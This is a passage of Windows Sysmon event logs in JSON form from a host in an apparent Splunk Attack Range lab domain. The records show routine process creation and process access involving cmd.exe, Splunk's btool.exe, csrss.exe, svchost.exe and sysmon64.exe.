{E2A3D6B1-10FF-5F25-0000-001014590500}\r\nParentProcessId: 4824\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.697","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D7590500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-001014590500}","ParentProcessId":"4824","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-001014590500}\r\nSourceProcessId: 4824\r\nSourceThreadId: 4820\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D7590500}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001014590500}","SourceProcessId":"4824","SourceThreadId":"4820","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D7590500}","TargetProcessId":"4840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D7590500}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D7590500}","TargetProcessId":"4840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 